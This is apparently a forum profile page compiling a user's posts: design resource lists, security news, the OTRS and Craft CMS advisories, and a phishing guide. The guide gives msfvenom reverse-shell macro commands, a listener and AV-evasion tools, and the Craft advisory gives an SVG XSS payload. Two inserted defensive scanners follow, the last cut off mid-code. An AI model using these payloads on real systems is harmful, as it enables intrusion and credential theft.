Fi8sVrs last won the day on May 31

Fi8sVrs had the most liked content!

Community Reputation

837 Excellent

  1. ● Free design elements from Dribbble.
  ● Search Dribbble for "freebie". Priceless!
  ● Attractive work, made with care for each pixel.
  ● Free and premium work for the professional community.
  ● Works in the material design style based on Google's guidelines.
  ● Free creative work for children.
  ● Free PSD-format works from Dribbble users.
  ● Fresh free work for designers.
  ● Download a free PSD every day.
  ● The best free sites from Dribbble and Behance.
  ● High-quality work for the coolest people.
  ● Free works.
  ● Fresh free work on Mondays.
  ● Graphic elements for everyone.
  ● Free work, news and other information.
  ● The most beautiful set of design elements for iOS.

30 useful resources for the graphic designer

Everyone is invited to stock up on font files, textures, plug-ins, templates, brushes, actions and assorted clipart. Please note you will need to carefully separate the wheat from the chaff on these resources, but the chance of finding something suitable is still there.

1. - more than 800 sets of brushes
2. - brushes, shapes, textures, actions, frames, fonts
3. - brushes, styles, fonts
5. - brushes, sorted by topic
6. - gradients, patterns, brushes, actions, styles, textures, shapes, templates
7. - brushes, patterns, textures, shapes, actions, fonts, gradients
8. forum index.php?s=dd5a1f42da7b55558fa3f2fd - warehouse on Demiarte: brushes, plug-ins, clipart
9. - brushes, sorted by topic
10. - gradients, brushes, actions, styles, textures, shapes, patterns
11. - a huge collection of brushes
12. - brushes, fonts, templates
13. www.photoshop- - gradients, brushes, actions, styles, textures, shapes, patterns
14. - Christmas brushes, fonts, styles, clipart
15. - brushes, fonts, shapes
16. - gradients, brushes, actions, styles, textures, shapes, templates, fonts
17. - templates, brushes, fonts, textures
18. - a collection of brushes
19. - styles, shapes, textures, plug-ins, frames, patterns
20. - brushes, fonts, templates, frames
21. - brushes, plugins, actions, clipart, fonts, borders, textures
22. /download - brushes, fonts, styles, clipart
23. - plugins, brushes, actions, styles, shapes, gradients, textures, fonts
24. - plugins, brushes, styles, gradients, textures, fonts
25. - gradients, brushes, actions, styles, textures, shapes, templates, drawing
26. www. - textures, brushes, styles, filters
27. - fonts, brushes
28. - brushes, masks, actions, textures, fonts
29. - brushes, textures, shapes, fonts
30. - actions, gradients, brushes, plugins, styles, textures

Large list of useful resources for designers and web developers

1. Photos. Free resources: Unsplash, Picjumbo, Gratisography, Superfamous, Little Visuals, Split Shire, Pixabay, IM Free (www.imcreator.com/free), New Old Stock, Function Free Photos, Paul Jarvis Free Photos. Paid resources: Compfight, Stocksy, Placeit Product Shots, iStockphoto.
2. Fonts: Okay Type, Typekit, MyFonts, Fonts, Font Squirrel, DaFont, Google Fonts, 1001 Free Fonts, Lost Type Co-op, IcoMoon.
3. Mockups: Mockupr, Flinto, Icon Strike!, WebFlow, Mockuuups.
4. Preliminary design: Moqups, Mockflow, Mockingbird.
5. Prototyping: Mixture, Gridset.
6. Responsive design: Gridpak, Responsive Nav, Off-Screen Navigation, Responsive Web Design Test, Media Queries, Foundation by ZURB, Jetstrap, WebFlow, Gridset, BrowserStack, Sassaparilla, Dimensions (Chrome extension).
7. Working with color: 0 to 255, Colour Lovers, Brand Colors, Adobe Kuler Color Wheel, Color Scheme Designer, Hex to RGB Converter.
8. CSS: Animate.css, CSS3 Animation Cheat Sheet, Can I Use?, Animation Fill Code.
9. HTML5: HTML5 Please, Can I Use?
10. Free files for Photoshop: Fribbble, Premium Pixels, Teehan+Lax iOS 7 PSD GUI (iPhone) (www.teehanlax.com/tools/iphone), Teehan+Lax iOS 7 PSD GUI (iPad), iPhone Mockuuups.
11. Icons: Other Icons, Batch, Icon Sweets, IcoMoon.
12. Image compression: TinyPNG, JPEGmini, ImageOptim.
13. Tools for Photoshop: Mac Rabbit Slicy, Renamy.
14. For inspiration: Siteinspire, Land Book, Awwwards, The Best Designs, Dribbble, Behance.
15. Where to find orders: ooomf, Juiiicy, Dribbble Jobs, Authentic Jobs, Workfu, Onsite.
16. Building maps: MapBox, Leaflet, Google Map Builder, Snazzy Maps.
17. Online learning: Treehouse, Dev.Opera, Steer, Lynda, Codecademy, Code School.
18. Podcasts on design and the web: The Freelance Web, Unfinished Business, Happy Monday, Boagworld (www.boagworld.com/show), Shop Talk Show, The Back to Front Show, The Big Web Show, Upfront Podcast (www.upfrontpodcast.com), The Industry.
19. Presentation art: Mark Boulton's tips, On Speaking by Brad Frost, Suggestions for speakers by Frank Chimero, The best advice on public speaking by Ladies in Tech, You're paying to speak by Remy Sharp.
20. Just useful websites: Symbols; a service to remove your profiles from different sites; learn your UDID; know what some shape or icon looks like but can't remember its name? Draw it and it will be suggested to you.
21. Books: Grid Systems in Graphic Design; HTML & CSS: Design and Build Web Sites; The Pocket Guide series, Collection 1, 2 or 3 (just £6 for the 4 books in each); The Geometry of Type; Insites: The Book; Don't Make Me Think; Above the Fold; Design is a Job; the required minimum of books for the novice web designer.
  2. A critical vulnerability has been discovered in Microsoft-owned Skype, the most popular free web messaging and voice calling service, that could allow hackers to remotely execute malicious code and crash systems.

Skype is a free online service that allows users to communicate with peers by voice, video, and instant messaging over the Internet. The service was acquired by Microsoft Corporation in May 2011 for US$8.5 billion due to its worldwide popularity.

Security researcher Benjamin Kunz-Mejri from Germany-based security firm Vulnerability Lab discovered the previously unknown stack buffer overflow vulnerability, documented as CVE-2017-9948, in Skype Web's messaging and call service during a team conference call. The vulnerability is considered a high security risk with a 7.2 CVSS score and affects Skype versions 7.2, 7.35, and 7.36 on Windows XP, Windows 7 and Windows 8, Mejri said in a public security disclosure published on Monday.

No User Interaction Needed

What's worse? The stack buffer overflow vulnerability doesn't require any user interaction and only requires a low-privileged Skype user account. So, an attacker can remotely crash the application "with an unexpected exception error, to overwrite the active process registers," or even execute malicious code on a target system running the vulnerable Skype version. The issue resides in the way Skype uses the 'MSFTEDIT.DLL' file in case of a copy request on local systems.

Here's How Attackers Can Exploit This Flaw

According to the vulnerability report, attackers can craft a malicious image file and then copy and paste it from the clipboard of a computer system into a conversation window in the Skype application. Once this image is hosted on a clipboard on both the remote and the local systems, Skype experiences a stack buffer overflow, causing errors and crashing the application, which leaves the door open for more exploits.

Proof-of-Concept Code Released

The security firm has also provided proof-of-concept (PoC) exploit code that you can use to test the flaw. Vulnerability Lab reported the flaw to Microsoft on 16 May, and Microsoft fixed the issue and rolled out a patch on 8 June in Skype version 7.37.178. If you are a Skype user, make sure that you run the latest version of the application on your system in order to protect yourself from cyber attacks based on this vulnerability.

Via
  3. Winpayloads is a tool to provide undetectable Windows payload generation with some extras, running on Python 2.7. It provides persistence, privilege escalation, shellcode invocation and much more. The tool uses Metasploit's meterpreter shellcode, injects the user's IP and port into the shellcode and writes a Python file that executes the shellcode using ctypes. This is then AES encrypted and compiled to a Windows executable using pyinstaller.

Features
  • UACBypass – PowerShellEmpire
  • PowerUp – PowerShellEmpire
  • Invoke-Shellcode
  • Invoke-Mimikatz
  • Invoke-EventVwrBypass
  • Persistence – adds payload persistence on reboot
  • Psexec Spray – sprays hashes until a successful connection and psexecs the payload on the target
  • Upload to local webserver – easy deployment
  • Powershell stager – allows invoking payloads in memory
  • & more

Winpayloads also comes with a few features such as UAC bypass and payload persistence. These are PowerShell files that execute on the system when the meterpreter gets a reverse shell. The UAC bypass is written by PowerShellEmpire and uses an exploit to bypass UAC on local administrator accounts and creates a reverse meterpreter running as local administrator back to the attacker's machine. Winpayloads can also set up a SimpleHTTPServer to put the payload on the network to allow downloading on the target machine, and also has a psexec feature that will execute the payload on the target machine if supplied with usernames, domain, passwords or hashes.

Installation
  git clone
  cd winpayloads
  ./
will set up everything needed for Winpayloads.

Start Winpayloads
  ./
Type 'help' or '?' to get a detailed help page.

Download Source
  4. 'Do I really need to give this website so much about me?' That's exactly what I usually think after filling in, but before submitting, a web form online that asks for my personal details to continue. I am sure most of you would either close the whole tab or edit the already typed details (or those filled in by the browser's auto-fill feature) before clicking 'Submit' — isn't it?

But closing the tab or editing your information hardly makes any difference, because as soon as you have typed or auto-filled anything into the online form, the website captures it automatically in the background using JavaScript, even if you haven't clicked the Submit button.

During an investigation, Gizmodo discovered that code from NaviStone, used by hundreds of websites, invisibly grabs each piece of information as you fill it out in a web form before you hit 'Send' or 'Submit.'

NaviStone is an Ohio-based startup that advertises itself as a service to unmask anonymous website visitors and find out their home addresses. There are at least 100 websites using NaviStone's code, according to BuiltWith, a service that tells you what tech sites employ. Gizmodo tested dozens of those websites and found that the majority of sites captured visitors' email addresses only, but some websites also captured their personal information, like home addresses and other typed or auto-filled information.

How Websites Collect 'Data' Before Submitting Web Forms

Using JavaScript, the websites in question were sending a user's typed or auto-filled information from an online form to a server at "", which is owned by NaviStone, leaving no option for people who immediately change their minds and close the page. When the publication asked NaviStone how it unmasks anonymous website visitors, the company declined to reveal anything, saying that "its technology is proprietary and awaiting a patent."

However, when asked whether email addresses are gathered in order to identify the person and their home address, the company's chief operating officer Allen Abbott said NaviStone does not "use email addresses in any way to link with postal addresses or any other form of PII [Personally Identifiable Information]."

Some websites using NaviStone's code are collecting information on visitors who are not even their customers and have no relationship with the companies. After the story went live, NaviStone agreed to no longer collect email addresses from visitors this way; as Abbott said, "While we believe our technology has been appropriately used, we have decided to change the system operation such that email addresses are not captured until the visitor hits the 'submit' button."

Disable Auto-Fill; It's Leaking Your Information!

In order to protect yourself from websites collecting your data without your consent, you should consider disabling the auto-fill form feature, which is turned on by default, in your browser, password manager or extension settings. At the beginning of this year, we also warned you about the auto-fill feature, which automatically fills out web forms based on data you have previously entered in similar fields but can be misused by attackers hiding fields (out of sight) in a web form and stealing your personal information without your knowledge.

Here's how to turn this feature off in Chrome: go to Settings → Show Advanced Settings at the bottom, and under the Passwords and Forms section uncheck the "Enable Autofill to fill out web forms with a single click" box. In Opera, go to Settings → Autofill and turn it off. In Safari, go to Preferences and click on AutoFill to turn it off.

Also, think twice before filling your details into any web form, before it gets too late.

Via
  5. MySQL-G0ld

This program issues brute force attacks against a MySQL server; supply a CRLF wordlist. The MySQL daemon should not have Remote MySQL enabled nor be exposed to the public internet. Think LAN, privilege escalation, shared hosting attacks etc.

Attack modes: Password spray / Basic
File Hash: d3e11a2d0234cab7c9244c26d61004cc
Language: C
Credits: John Page aka hyp3rlinx

Download (85.7 KB)
  6. This is pretty interesting: the prices for Fake News as a Service have come out after some research by Trend Micro. Imagine that you can create a fake celebrity with 300,000 followers for only $2,600. Now we all know this Fake News thing has been going on for a while, and of course, if it's happening, some capitalist genius is going to monetize it and offer it as a professional service. You can read the full 77-page report by Trend here: The Fake News Machine [PDF]

It's insightful to see the types of services that are available, and how they are categorised. Now I've known about social media manipulation for many years (fake likes, followers, YouTube views and so on), but to see this kind of Fake News at scale, as a service, is something new to me. Unfortunately there's no technical solution to thwart this; it's purely about education. If people don't fact check, cross check and verify sources before disseminating them, this whole Fake News situation is just going to get worse and worse. I feel like it had a serious impact on both Brexit and the Trump election, and it's likely to stay very relevant in any large-scale world events, as so many people now base their opinions on what they see online.

Sources: Darknet, The Register
  7. There are many ways to run a phishing campaign. The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website. Running these campaigns is fairly straightforward, and a couple of tools make this very easy to do. The most common of all is likely the Social Engineer Toolkit. SET works great for cloning an existing website and setting up a PHP form to collect credentials. While this technique is very effective, it may also be a good choice to perform phishing attacks with malicious documents.

Macro Attacks

The most common maldoc is a malicious Microsoft Word document. Typically these will contain embedded macros which execute a payload when opened. Because of this, modern Windows will usually display two prompts that the user must click through before the payload is executed. Typically they must click "Enable Content" and then subsequently click "Enable Macros". There are quite a few ways you can generate these. The simplest way is with Metasploit. As documented here, all you need to do is use msfvenom to generate some malicious Visual Basic code like so:

  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

And then paste it into the Visual Basic Editor. Set up a listener in the Metasploit framework and wait for the user to enable macros.

  msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST; set LPORT 8080; run; exit -y"

While you can use multiple encoding types, this attack is likely to get caught by anti-virus. You can use other tools besides msfvenom to generate the VBA code required for the macro. You can also use Unicorn by TrustedSec. To generate the payload use:

  python windows/meterpreter/reverse_tcp 443 macro

And you can catch the meterpreter shell with the same listener you would use with the msfvenom payload.

OLE Attack

If you like PowerShell Empire more than Metasploit, Empire also has a stager for Office macros. Enigma0x3 has a good blog post on how to do this. Also notable is the OLE attack. Instead of using a macro to execute a payload, you can embed a file within the document itself. By changing the icon, you may be able to trick the user into executing a bat file which contains a malicious payload. This attack is also documented in the same blog post. This attack will prompt the user before executing the payload, as seen below:

AV Bypass

Because of the success of the macro attack method, AV vendors have been quick to adapt. If AV is causing an issue, there are a few more tools that you can use to avoid detection. LuckyStrike is a tool that was released at DerbyCon 2016. The author has a lengthy blog post on this tool that is well worth the read. LuckyStrike contains a bunch of obfuscation methods to avoid detection and can even go as far as encrypting the payload, ensuring that an AV sandbox will never be able to execute it for dynamic analysis. If Software Restriction Policies or EMET are what is keeping you down, wePWNise might be the tool for you. As MRWLabs explains it on their website, "It collects information through enumeration of relevant parts of the Registry where various policy security settings are stored, and identifies suitable binaries which are safe to inject code into."

Capturing Hashes

Now to get into the more exotic methods. A very novel way of capturing NTLM hashes is with a tool named WordSteal. The way WordSteal works is by embedding a reference to a file hosted on a malicious SMB server. When the document is opened, the client will try to connect to the SMB server without any user interaction. This will capture an NTLM handshake that can be sent to a password cracker, just as you would do if you were running Responder within the local network. The biggest caveat here is that the client network must be able to initiate SMB connections outbound. This means that there must not be any egress rule blocking port 445. This is not always the case, but if it goes through, this is a good way to collect hashes, as the user does not have to do anything other than open the document. If you are able to crack domain credentials, there is a good chance you can use Microsoft Outlook to execute a payload within the target environment, as described in my blog post here: From OSINT to Internal – Gaining Access from outside the perimeter

This attack requires a malicious SMB server. Fortunately, we can stand this up quite easily by using Metasploit. Just run the following module:

  use auxiliary/server/capture/smb

And it will output any handshakes that it captures. Metasploit has the option of outputting this data in a format you can send to Cain and Abel or John the Ripper.

Prompting for Credentials

Phishery is another great tool for non-traditional credential harvesting. Phishery is written in Go, and pre-compiled binaries are available here. The way Phishery works is by using HTTP Basic Authentication delivered over SSL. This tool is very easy to use, although to bypass the warnings to the end user you will need to set up a domain with a proper SSL certificate, or they will see this:

After clicking "Yes", or bypassing it altogether with a valid certificate, the user will receive an authentication prompt. If they enter their credentials, you will see them posted back to the listening server.

Exploits

While all these require some level of social engineering, you can also exploit the target with an exploit. Recently CVE-2017-0199 was disclosed by FireEye after it had been found in the wild. This exploit targets RTF files opened with Microsoft Word. MDSec published a blog post on how to exploit it, and a blogger wrote a step-by-step set of instructions to create a working exploit. If you don't want to do this manually, there is also a toolkit published on GitHub for exploiting this. It can create the RTF file, host the HTA payload, and host an exe that is executed by the HTA file. The only other things you need to make it work are msfvenom and Metasploit, although with some minor modifications it could be used to deliver any other payload as well, such as a PowerShell Empire stager. At the time of this writing, there is a Metasploit module in development for this attack. A pull request has been opened and will likely be merged into the main branch soon.

Source:
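The WordSteal and CVE-2017-0199 techniques in the post above both rely on a document referencing something outside itself that Word resolves on open: a UNC path (so Word authenticates to an SMB host) or a remote OLE link. A defender's triage script for the OOXML case, added here as an example that is not code from the post or from any tool it names: it unzips a .docx, reads every .rels part and flags external targets that point at an SMB share or that Word fetches automatically (OLE objects, attached templates). The sample package and the 203.0.113.5 address are constructed for the demo.

```python
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % RELS_NS

# Relationship types whose external target Word fetches as soon as the document
# opens, with no click required (remote OLE object, remote template).
AUTO_FETCH_TYPES = ("/oleObject", "/attachedTemplate")


def classify_target(rel_type, target):
    """Return a reason string if an External relationship target is risky, else None."""
    t = target.strip()
    # UNC path (\\host\share\file, also the //host/share form): Office opens it
    # over SMB and sends NTLM credentials to the host, which is what
    # WordSteal-style hash capture relies on.
    if t.startswith("\\\\") or t.startswith("//"):
        return "UNC path: opening the document authenticates to this SMB host (NTLM leak)"
    if urlparse(t).scheme.lower() == "file":
        return "file:// URL: resolves to a remote SMB share (NTLM leak)"
    # Any scheme is suspicious for these types: the content is fetched and
    # activated on open (CVE-2017-0199-style remote OLE links).
    if rel_type.endswith(AUTO_FETCH_TYPES):
        return "remote OLE object/template fetched automatically on open"
    return None


def scan_docx(data):
    """Scan a .docx given as bytes; return a list of risky external relationships."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # internal parts never leave the package
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                reason = classify_target(rel_type, target)
                if reason:
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel_type.rsplit("/", 1)[-1],
                        "target": target,
                        "reason": reason,
                    })
    return findings


# Constructed sample: one document.xml.rels with a WordSteal-style image pulled
# from a UNC path, a harmless hyperlink, a remote OLE object and an internal part.
# 203.0.113.5 is a documentation (TEST-NET-3) address, not a real host.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" TargetMode="External"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="\\\\203.0.113.5\\share\\logo.png"/>
  <Relationship Id="rId2" TargetMode="External"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
    Target="https://example.com/report"/>
  <Relationship Id="rId3" TargetMode="External"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    Target="http://203.0.113.5/update.hta"/>
  <Relationship Id="rId4"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
    Target="styles.xml"/>
</Relationships>
"""


def build_sample_docx(rels_xml=SAMPLE_RELS):
    """Build a minimal in-memory package with just the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Pass a real .docx path to scan it; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for f in scan_docx(data):
        print("%s: %s (%s) -> %s\n    %s" % (f["part"], f["id"], f["type"], f["target"], f["reason"]))
```

The same check belongs in a mail gateway or sandbox pre-filter, and the egress rule on TCP 445 the post mentions is the complementary network-side control.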
  8. //removed
  9. search on torrent/warez
  10. @proxy_chainer, has the summer fatigue hit you?
  11. Cybersecurity researchers found malware linked to Britney Spears' Instagram account, where the attacker posted a malicious comment. According to the research, the hacker group named TURLA is behind the malware; it's a Russian group known for targeting governments and officials. Cyber attackers are spreading malware through a comment posted on the Instagram account of the world's most famous singer, Britney Spears.

According to ESET, the malware was hidden in a Firefox browser extension. The extension uses a bit.[ly] URL to reach its C&C, but the URL path is nowhere to be found in the extension code. In fact, it obtains this path by using comments posted on a specific Instagram post. The one that was used in the analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account.

Technical analysis

This Firefox extension implements a simple backdoor. It will first gather information on the system it is running on and send it to the C&C, encrypted using AES. This is very similar to what the extension described in the Pacifier APT white paper does. The backdoor component has the ability to run four different types of commands:
  • execute arbitrary file
  • upload file to C&C
  • download file from C&C
  • read directory content – send a file listing, along with sizes and dates, to C&C

While we believe this to be some type of test, the next version of the extension – if there is one – is likely to be very different. There are several APIs used by the extension that will disappear in future versions of Firefox. For example, it uses XPCOM to write files to disk and sdk/system/child_process to launch a process. These can only be used by add-ons that will be superseded by WebExtensions starting with Firefox 57. From that version onwards, Firefox will no longer load add-ons, thus preventing the use of these APIs.

Conclusion

The fact that the Turla actors are using social media as a way to obtain their C&C servers is quite interesting. This behavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social media to recover a C&C address are making life harder for defenders. Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C&C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim and finding new ways to make the C&C retrieval a bit more difficult.

Via:
  12. We managed to get a recording of most of the talks during the 10th edition. While the recording quality is not the best, we hope it will benefit people who couldn't attend. For DevOops Redux, the recording quality was unfortunately really bad, but CERN did an awesome one the day before Insomni'hack. Seeing how great theirs was, we would have been ashamed to publish ours, so here's the link to this great talk hosted on CERN's site:

And here's the link to the Insomni'hack 2017 YouTube playlist:

Source
  14. Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters. Versions affected include OTRS 5.0.x, OTRS 4.0.x, and OTRS 3.3.x.

Advisory ID: SYSS-2017-018
Product: OTRS
Manufacturer: OTRS
Affected Version(s): OTRS 5.0.x, OTRS 4.0.x, OTRS 3.3.x
Fixed Version(s): OTRS 5.0.20, OTRS 4.0.24, OTRS 3.3.17
Tested Version(s): 5.0.19
Vulnerability Type: Access to Installation Dialog
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2017-05-30
Solution Date: 2017-06-06
Public Disclosure: 2017-06-08
CVE Reference: CVE-2017-9324
Author of Advisory: Sebastian Auwarter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OTRS is a ticket management system. The manufacturer describes the product as follows (see [1]):

"OTRS is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. With a fast implementation and easy customization to your needs it helps you reducing costs and increasing the efficiency and transparency of your business communication."

Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The recommended way to install OTRS is to use the installation dialog found at http://vulnerablehost/otrs/

After successful installation, OTRS prevents further use of this installer. Any authenticated user can access the installation functionality of OTRS by referencing the installer via a crafted URL. The URLs that can be used to access the installer can be one of the following:

  * http://vulnerablehost/otrs/
  * http://vulnerablehost/otrs/;Subaction=Intro
  * http://vulnerablehost/otrs/;Subaction=Start
  * http://vulnerablehost/otrs/;Subaction=System

At the end of each "installation" step, the user is redirected to the start page. Therefore, the next step of the installation dialog must be called directly using the Intro, Start (Database) or System subaction, respectively.

By using the installer tool, an attacker can change a variety of parameters, including the superuser password, database settings, mail server settings, log file location and instance ID.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

On a newly installed instance of OTRS, logged in as any valid user, navigate to;Subaction=Start to change the database parameters or to;Subaction=System to get a superuser password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

This vulnerability is fixed in the latest versions of OTRS, and it is recommended to upgrade to the latest patch level.

Fixed releases can be found at:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2017-05-30: Vulnerability discovered
2017-05-30: Vulnerability reported to manufacturer by project member
2017-06-06: Vulnerability reported to manufacturer via security advisory
2017-06-06: Fix provided by manufacturer
2017-06-06: Vulnerability disclosed by manufacturer
2017-06-08: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for OTRS
[2] SySS Security Advisory SYSS-2017-018
[3] SySS Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwarter of SySS GmbH.

E-Mail:
Public Key:
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL:

Source
  15. # Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
# Date: 2017-06-08
# Exploit Author: Ahsan Tahir
# Vendor Homepage:
# Software Link:
# Version: 2.6
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email:
# Contact:

Release Date:
=============
2017-06-08

Product & Service Introduction:
===============================
Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.

Abstract Advisory Information:
==============================
Ahsan Tahir, an independent security researcher, discovered a persistent cross-site scripting vulnerability through unrestricted file upload of an SVG file in Craft CMS (v2.6).

Vulnerability Disclosure Timeline:
==================================
2017-06-08: Found the vulnerability.
2017-06-08: Reported to vendor.
2017-06-08: Published.

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
The security risk of the XSS vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6. Exploitation of the persistent XSS web vulnerability requires a limited editor user account with low privileges (only editing news) and only low user interaction. If the attacker uploads any file that can be used for XSS (HTML, SWF, PHP, etc.), it will not be accepted for upload as an image. But for images it stays the same. So if the attacker uploads an SVG with JS content, it will work fine and execute the JS! The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work. Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.

Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by a low-privileged user/editor with privileges only for editing news. After successful exploitation, this attack can be used by the editor to hijack the admin account! For security demonstration or to reproduce the vulnerability, follow the provided information and steps below to continue.

Payload (Exploitation):

  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
  <svg version="1.1" baseProfile="full" xmlns="">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">
      alert(document.domain);
    </script>
  </svg>

[+] Manual steps to reproduce ..
1. Log in with the editor account (only privilege to edit news) in Craft CMS
2. Go to the 'add news' option: https://localhost/admin/entries/news/new
3. Put random values in the title
4. On your attacker machine, create a file named 'xss.svg' (without quotes) and put the payload above in the file
5. Upload the xss.svg file in the featured image option in Craft CMS
6. Click on Save
7. Now go to: https://localhost/s/assets/site/xss.svg
8. XSS payload execution occurs and an alert pops up with the domain name

Credits & Authors:
==================
Ahsan Tahir - []

Source
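The upload filter described in the advisory lets the SVG through because it is an image type, and the script inside runs because the file is then served inline as image/svg+xml from the site's own origin. As an added example (not the advisory author's code and not Craft's), a server-side SVG gate in Python: it parses the upload as XML and rejects <script> and <foreignObject> elements, on* event-handler attributes and javascript: URLs, and serves anything that passes as a download so the browser never renders it in the application's origin. The sample SVGs are constructed; the first reproduces the advisory's payload with the standard SVG namespace filled in.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that can execute script or embed arbitrary HTML inside an SVG.
FORBIDDEN_ELEMENTS = {"script", "foreignObject"}


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def find_svg_issues(svg_bytes):
    """Return the reasons an SVG upload must be rejected; an empty list means it passed."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    issues = []
    if root.tag != "{%s}svg" % SVG_NS:
        issues.append("root element is not <svg> in the SVG namespace")
    for el in root.iter():
        name = _local(el.tag)
        if name in FORBIDDEN_ELEMENTS:
            issues.append("forbidden element <%s>" % name)
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                issues.append("event handler attribute %s on <%s>" % (aname, name))
            # Drop whitespace browsers ignore inside a URL (e.g. "java\tscript:")
            # before looking for the scheme; this also covers xlink:href and
            # SMIL targets such as <set to="javascript:...">.
            compact = "".join(value.split()).lower()
            if "javascript:" in compact:
                issues.append("javascript: URL in %s on <%s>" % (aname, name))
    return issues


def handle_upload(filename, svg_bytes):
    """Decide whether to store the upload and how it must be served afterwards."""
    issues = find_svg_issues(svg_bytes)
    if issues:
        return {"accepted": False, "issues": issues}
    # Even a clean SVG is served as a download from the assets path: inline
    # image/svg+xml rendering in the site's origin is what hands the script
    # document.domain (and the session) in the advisory's PoC.
    return {
        "accepted": True,
        "headers": {
            "Content-Type": "image/svg+xml",
            "Content-Disposition": 'attachment; filename="%s"' % filename,
            "X-Content-Type-Options": "nosniff",
        },
    }


# Constructed samples. ADVISORY_PAYLOAD is the advisory's SVG with the real
# namespace; the next two cover handler attributes and javascript: links.
ADVISORY_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
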